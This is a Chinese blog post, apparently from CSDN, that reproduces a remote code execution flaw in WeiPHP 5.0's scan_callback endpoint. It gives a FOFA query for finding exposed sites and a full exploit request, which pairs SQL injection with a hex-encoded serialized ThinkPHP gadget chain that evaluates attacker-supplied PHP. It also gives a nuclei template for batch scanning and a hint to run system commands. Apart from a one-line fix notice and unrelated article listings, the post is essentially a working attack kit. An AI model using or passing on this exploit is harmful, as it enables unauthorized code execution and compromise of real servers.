漏洞复现-weiphp5.0 scan_callback代码执行漏洞

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量313 收藏 1
点赞数 9
分类专栏: 漏洞复现 Web 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69010236/article/details/136657016
版权

漏洞描述

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

影响版本

WeiPHP5.0

漏洞复现

FOFA:(body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")

 漏洞数据包:

POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 1340
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

<xml>
<product_id>aaaa</product_id>
<appid>exp</appid>
<appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
<mch_id>aaa</mch_id>
<nonce_str>aaa</nonce_str>
<openid>aaa</openid>
</xml>

执行MD5加密值

使用MD5进行解密

批量检测

id: weiphp-cms-scan_callback-rce

info:
  name: weiphp-cms-scan_callback-rce
  author: unknow
  severity: critical
  description: weiphp5.0 scan_callback 存在代码执行漏洞。
  tags: weiphp,rce
  metadata:
    fofa-query: (body="content=\"WeiPHP" || body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0")
http:
  - raw:
      - |
        POST /public/index.php/weixin/Notice/index?img={{rce}}exit(); HTTP/1.1
        Host: 
        Content-Type: application/x-www-form-urlencoded

        <xml>
        <product_id>aaaa</product_id>
        <appid>exp</appid>
        <appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
        <mch_id>aaa</mch_id>
        <nonce_str>aaa</nonce_str>
        <openid>aaa</openid>
        </xml>

    payloads:
      rce:
        - "echo+md5(123);"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1==500 && contains(body_1, "202cb962ac59075b964b07152d234b70") && contains(header_1, "text/html")'

#执行:echo+md5(123);system('whoami');

 修复建议

请关注官网更新 :https://www.weiphp.cn/

鹤-云
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
08-03
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
weiphp_2.0_on_sae
11-26
WeiPHP是一个不错的开源的微信公众平台开发框架(已经含有大部分功能的实现了),可以在其基础上进行插件开发,设计自己的业务模块。 官方论坛: http://bbs.weiphp.cn/forum.php 由于SAE环境下没有文件的本地写...
PHP实例开发源码-weiphp微信公众平台框架 php版.zip
11-21
PHP实例开发源码—weiphp微信公众平台框架 php版.zip PHP实例开发源码—weiphp微信公众平台框架 php版.zip PHP实例开发源码—weiphp微信公众平台框架 php版.zip
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp3.0_892-内测包 建议不要商用,只用测试
11-23
weiphp3.0_892-内测包 建议不要商用,只用测试
等保测评和安全运维
weixin_64392888的博客
06-11 587
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 204
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 941
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 628
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 869
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 712
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
Linux网络安全
十一、的博客
06-09 786
由于Linux系统的安全稳定,所以经常被用作网络应用服务器。但由于程序代码缺陷的难以避免,这些安装在Linux系统上的网络程序往往会存在着各种漏洞,而入侵者则是利用这些漏洞进行网络攻击,进入系统窃取数据、破坏系统或使系统无法提供正常服务等。Ping是基于ICMP协议的一个实用程序,用于验证两台计算机之间网络连接的可达性和质量。它通过发送ICMP回声请求消息到目标主机,并等待回声应答消息来判断网络状态。当执行ping命令时,它会生成一个ICMP回声请求数据包并发送到指定的目标主机。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 985
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
安全等保评测-什么是“等保“?
2401_84434570的博客
06-11 589
它旨在通过对信息和信息系统的安全性进行评估,发现并纠正存在的安全漏洞和隐患,提高信息系统的安全性和可靠性,保障信息的安全。等级保护测评是经公安部认证的具有资质的测评机构,依据国家信息安全等级保护规范规定,受有关单位委托,按照有关管理规范和技术标准,对信息系统安全等级保护状况进行检测评估的活动。进行现场调研和检测:对系统和数据进行现场调研和检测,了解系统和数据的安全状况和存在的问题。确定测评目标和范围:明确要测评的信息和信息系统的范围和目标,了解业务需求和安全需求。
采用PHP语言(医院安全不良事件上报系统源码)医院不良事件 各类事件分析、分类、处理流程
爱笑的源码博客
06-11 1008
分为外部报告系统和内部报告系统两类。内部报告系统主要以个人为报告单位,由医院护理主管部门自行管理的报告系统。外部报告系统主要以医院护理主管部门为报告单位,由卫生行政部门或行业组织管理的报告系统。
渗透测试之内核安全系列课程:Rootkit技术初探(四)
fearhacker的专栏
06-10 1041
当 PDE( 页目录项 ) 的 PS 位( 第8位 ) 为 1 时,代表PDE( 页目录项 )直接指向页( P ),这时,页的大小为 4MB(这是一个大页),此时,这个大页( 4MB 大小的物理页)的物理地址计算公式为: PDE( 页目录项 ) 的 高 10 位 + 线性地址 的 低 22 位。上述的页目录( PDT )的子项(PDE)除了前7位之外,其它各比特位用途不固定(各关键比特位的位置,同样不固定),因操作系统类型、CPU 版本不同而存在差异!
CentOS7下快速升级至OpenSSH9.7p2安全版本
junzhen_chen的博客
06-12 457
即可验证当前OpenSSH的版本 可以看到openssh的版本为OpenSSH_9.7p1 使用的是OpenSSL 3.0.13 30。vim pullsrc.sh 修改第23行为source ./version.env。在需要升级OpenSSH版本的CentOS7服务器上升级OpenSSH 具体升级操作命令如下。1、编译打包的shell脚本来源于该项目。2、sh pullsrc.sh下载源码包。最后会生成rpm包位于。3、准备编译所需环境。将生成的rpm包打包。
掉电安全文件系统littlefs移植
xuxuluo的博客
06-11 446
lfs.clfs.hlfs_util.clfs_util.hdfs_lfs.clfs_config.h(和lfs_util.h差不多)lfs_crc.c(和lfs_util.c差不多)然后再对比其源码,发现,littlefs的源码完全没有更改,更改的只有是适配层,因此,接下来重点看看适配层到底改了什么!如果定义了LFS_CONFIG,要自己做好配置中的结构体成员要初始化好vfs对接层要做好,这是每一个底层文件系统到vfs层必须要做的。
全方位·多层次·智能化,漫途水库大坝安全监测方案
mantoo2014的博客
06-11 338
水库大坝安全监测方案由大坝安全监测大坝渗流渗压监测、水雨情监测站、GNSS监测站、闸门开度监测、监控摄像头等站点组成,实时监测水库水雨情,闸门开关,视频监控现场实况。实现对水库防汛和大坝安全的监测与预警。通过先进的监测系统,我们能够收集到水库的水位、流量、水质、大坝变形渗流等多个关键参数的数据。我们借助精密的监测设备,对水库大坝的变形、渗流等多个关键参数进行实时监测。到2025年前,完成新出现病险水库的除险加固,配套完善重点小型水库雨水情和安全监测设施,实现水库安全鉴定和除险加固常态化。
STORAGE_WRITE_ERROR
07-28
引用\[1\]:错误位置FILE: /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php  LINE: 47TRACE#0 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php(47): E('_STORAGE_WRITE_...')#1 \[internal function\]: Think\Storage\Driver\File->put('./Application/R...', ' 。 引用\[2\]:#2 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage.class.php(37): call_user_func_array(Array, Array)#3 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Template.class.php(110): Think\Storage::__callstatic('put', Array)#4 /export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Template.class.php(110): Think\Storage::put('./Application/R...', ' 。 引用\[3\]:Thinkphp二次开发的程序很多,不得不说这是一个非常强大的程序,稍加开发,就能成为功能齐全的成品程序,无忧主机php免备案空间中也有很多这样的程序。无忧小编今天遇到一个客户,他说他安装网站的时候遇到报错了,报错内容如下: 。 问题:STORAGE_WRITE_ERROR 回答: STORAGE_WRITE_ERROR是一个错误信息,它出现在/export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php文件的第47行。这个错误通常是由于存储驱动器无法写入文件导致的。\[1\]根据错误信息的堆栈跟踪,可以看到在/export/app/admin.xxx.com.cn/ThinkPHP/Library/Think/Storage/Driver/File.class.php文件的put方法中出现了错误。\[2\]这个错误可能是由于权限问题或者文件路径错误引起的。如果您遇到这个错误,您可以检查文件的权限和路径是否正确,并确保存储驱动器有写入文件的权限。\[3\]如果问题仍然存在,您可以尝试联系程序开发者或者技术支持寻求帮助。 #### 引用[.reference_title] - *1* *2* [ThinkPHP3.2.2报错:_STORAGE_WRITE_ERROR_,_PHP教程](https://blog.csdn.net/weixin_42514616/article/details/116060696)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Weiphp安装报错 STORAGE_WRITE_ERROR_:./Runtime/Cache/Install/](https://blog.csdn.net/weixin_36115023/article/details/116060697)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值